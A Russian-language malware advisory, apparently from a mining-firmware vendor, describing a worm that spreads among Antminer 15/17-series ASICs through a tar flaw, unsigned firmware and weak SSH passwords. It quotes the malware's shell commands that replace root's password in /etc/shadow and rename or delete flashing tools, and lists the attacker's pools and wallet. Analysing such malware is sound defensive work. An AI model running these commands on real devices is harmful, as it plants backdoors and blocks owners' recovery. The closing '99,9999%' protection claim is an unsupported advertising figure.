В чатах майнинг сообществ стали появляться жалобы пользователей Antminer 17 серии о заражении вирусом. Количество случаев продолжает возрастать. Несмотря на известный факт, что использование прошивок без подписи грозит заражением ASICов, разработчики еще выпускают прошивки без подписи, тем самым подвергая своих пользователей опасности. Причиной тому отсутствие технических навыков программирования или же это делается специально? Вопрос риторический и пока что остается открытым.
Как оказалось, вирус опасен не только для S17, а поддерживает всю линейку Antminer 17 и 15. Этот же вирус ранее встречался на S9, T9, L3 и подобных моделях. Поэтому, чтобы обезопасить владельцев ASIC-ферм, разработчики прошивок Hiveon ASIC отследили все “симптомы”, чтобы помочь пользователям предотвратить заражение и сохранить фермы, и разумеется средства.
«Симптомы» вируса:
- Заражаются ASICи на прошивках без подписи и проверки на уязвимость в tar; со стандартным или простым паролем.
- Подвержены ASICи с открытым SSH на стандартном или простом пароле.
- Один зараженный ASIC может заразить все ASICи в сети!
Вирус на моделях Antminer: детальное описание
Анализ проводился на ASICе без вирусов, на стоковой прошивке от 20 августа 2019 года. Рядом с ним в одну сеть поставили зараженный ASIC. В итоге “здоровый” ASIC был заражен.
Вирус старый, распространялся ранее на S9/T9/L3 и другие модели с процессором Xilinx. Вирус определяет модель и в соответствии с ней заражает устройство. В настоящий момент вирус обновился и поддерживает 15 и 17 серию.
Кошельки и пулы, на которые майнит вирус
stratum+tcp://scrypt.hk.nicehash.com:3333#xnsub
3BjMWfED7RJvtBPPikJpweDT6A9xRW952x
stratum+tcp://scrypt.jp.nicehash.com:3333#xnsub
3BjMWfED7RJvtBPPikJpweDT6A9xRW952x
stratumtcp.com:8888
stcp
stratumtcp.com:3333
strtcp
Пути попадания вируса на ASIC:
Вирус из ASICа стучится на все модели Antminer через SSH и веб интерфейс ASICа, используя уязвимость в tar или отсутствие проверки подписи.
При обнаружении http, вирус использует уязвимость в tar при прошивке ASICов. Если нету защиты подписи, вирус попадает просто через скрипт прошивки ASICа.
Этой уязвимости подвержены:
- Все Antminer на официальной прошивке Bitmain, выпущенной до 1 декабря 2019 года, со стандартным или простым паролем в веб интерфейсе.
- Все Antminer на неофициальной прошивке, не имеющие защиту в виде подписи сертификатом и проверки на уязвимость в tar, со стандартным или простым паролем в веб интерфейсе.
- Все Antminer с открытым SSH на стандартном или простом пароле.
Попав на ASIC, вирус:
- Заменяет web-cgi скрипты прошивки, скрипт загрузки конфига. Также скрипты сброса настроек и редактирования конфигов.
- Включает SSH. Меняет пароль на SSH:
/etc/init.d/dropbear start ;
sed -i ‘1d’ /etc/shadow;
sed -i
‘1i\root:$6$saaYvC9T$PqLC9JWHDZsWYmpB0b0Zf.34b1m5/r9U6A8PPig2qzxAyUN
78pyI/vi7OZrCA0T2y1fT5UNFtPiBYuCyBTA610:15975:0:99999:7:::’
/etc/shadow ; /etc/init.d/lighttpd restart
- Заменяет модуль lighttpd, через который будет стучаться на сервер контроля вируса:
- На 17 серии заменяет загрузчик, в котором запрещена загрузка с SD карты для восстановления. И запрещает ввод команд в u-boot для восстановления через UART.
- На старых Antminer патчит загрузчик, отключает загрузку с SD.
- Прописывает себя в автозагрузку в разных местах.
- Заменяет системные бинарники и скрипты:
- Прослушивает введенный пользователем пароль в веб-интерфейсе при авторизации, сохраняет на ASICе и отправляет на сервер. Перехват пароля ставит под угрозу все ASICи в сети, т.к более 90% ставят одинаковый пароль на все устройства.
- Так же постоянно ищет на сервере обновления:
- Кошелек меняет не только в конфиге, но и при возможности патчит cgminer или bmminer/
- В старых моделях Antminer патчит бинарники или конфиги:
- После патча или замены разделов, удаляет бинарники, необходимые для перепрошивки:
mv /usr/sbin/mtd_debug /usr/sbin/mfd;
mv /usr/sbin/nandwrite /usr/sbin/nfd;
mv /usr/sbin/flash_erase /usr/sbin/fla;
rm -rf /usr/sbin/flash* /usr/sbin/nand* /usr/sbin/mtd*
Сам вирус распространяется в виде бинарного файла. Внутри него загрузчик в base64, архивы с эксплоитом, и все скрипты. Вирус не скачивает из интернета дополнительные части вирусов. Если зараженный ASIC попадет в сеть, то заразит другие, несмотря на фаервол на маршрутизаторе. Более того, бывали вирусы, которые прямо на ASIC-ах выполняли команды по скачиванию дополнительных частей, и им “помогал” фаервол.
Пример tar архива для прошивки через веб:
Так же есть еще несколько зашифрованных бинарников, исследование которых продолжается.
Как защитить ASIC
Чтобы избежать заражения, ставьте новую прошивку Bitmain старше 1 декабря, или Hiveon ASIC powered by MSKMINER с подписью и без уязвимостей в обновлении.
Прошивка Hiveon ASIC обеспечивает 99,9999% защиту от вирусов. Система контроля отслеживает и оповещает о проблемах на панели управления.
Цифровая подпись позволяет блокировать работу вируса при установке на зараженную контрольную плату, это зависит от уровня (степени) заражения (иногда без замены контрольной платы вирус не удалить).
Всегда используйте сложные пароли. Пароль на ASIC устройстве и маршрутизаторе должны быть разными.
Обеспечьте защиту ваших устройств заранее, чтобы избежать рисков заражения и возможных трат денег, времени на восстановление.
Берегите себя и свои фермы, и счастливого и безопасного майнинга!
Для читателей Forklog HUB мы дарим 20 долларов на майнинг, при регистрации на платформе Hive OS используйте промокод HUBforklogHive20 — получите 20$.